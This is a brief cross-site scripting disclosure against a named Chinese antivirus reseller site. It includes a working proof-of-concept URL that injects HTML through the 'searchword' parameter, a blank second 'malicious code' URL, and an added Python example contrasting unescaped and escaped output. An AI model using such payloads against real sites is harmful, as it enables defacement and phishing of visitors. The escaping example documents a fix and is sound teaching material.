> Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com
> Vulnerability: Cross Site Scripting

-------------------------
1. INFORMATION          |
-------------------------

Site: http://www.nod32.com.cn
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

-------------------------
2. DESCRIPTION          |
-------------------------

http://www.nod32.com.cn suffers from a remote cross-site scripting vulnerability, which can be used to scam users out of information and to execute malicious JavaScript that might remotely download a file to the victim's PC.

-------------------------
3. PROOF OF CONCEPT     |
-------------------------

Display a message using HTML:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E%3E%22%3Ctitle%3E%3Cmarquee%3EXSS%20by%20Sora%20-%20IMPROVE%20YOUR%20SECURITY%20-%20greyhathackers.wordpress.com&btnG=

Execute malicious code:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=
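
The root cause and the fix for the reflected `searchword` parameter, as an added example that is not part of the original advisory and not the site's own code. It is written in Python for illustration; `TEMPLATE` and all function names are hypothetical, since the site's real server-side markup is not shown on the page.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# First proof-of-concept URL, copied from the advisory above.
POC_URL = (
    "http://www.eset.com.cn/default.php?id=181&p=24&searchword="
    "%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E%3E%22%3Ctitle%3E%3Cmarquee%3E"
    "XSS%20by%20Sora%20-%20IMPROVE%20YOUR%20SECURITY%20-%20"
    "greyhathackers.wordpress.com&btnG="
)

# Hypothetical results template (assumption; the real page markup is unknown).
TEMPLATE = '<div class="results"><p>Results for: {term}</p></div>'

def search_term(url):
    """Return the decoded searchword parameter, as the server receives it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("searchword", [""])[0]

def render_unsafe(term):
    """Vulnerable pattern: request data is placed into HTML verbatim."""
    return TEMPLATE.format(term=term)

def render_safe(term):
    """Fixed pattern: encode for the HTML context before output."""
    return TEMPLATE.format(term=escape(term, quote=True))

class TagCollector(HTMLParser):
    """Records every start tag an HTML parser finds in the response."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(html_text):
    """List the elements present in a rendered response."""
    collector = TagCollector()
    collector.feed(html_text)
    collector.close()
    return collector.tags

if __name__ == "__main__":
    term = search_term(POC_URL)
    print("unsafe:", tags_in(render_unsafe(term)))  # template tags plus injected ones
    print("safe:  ", tags_in(render_safe(term)))    # template tags only
```

With the unescaped render, the parser reports elements that came from the query string rather than the template; with the escaped render, the same input appears only as text.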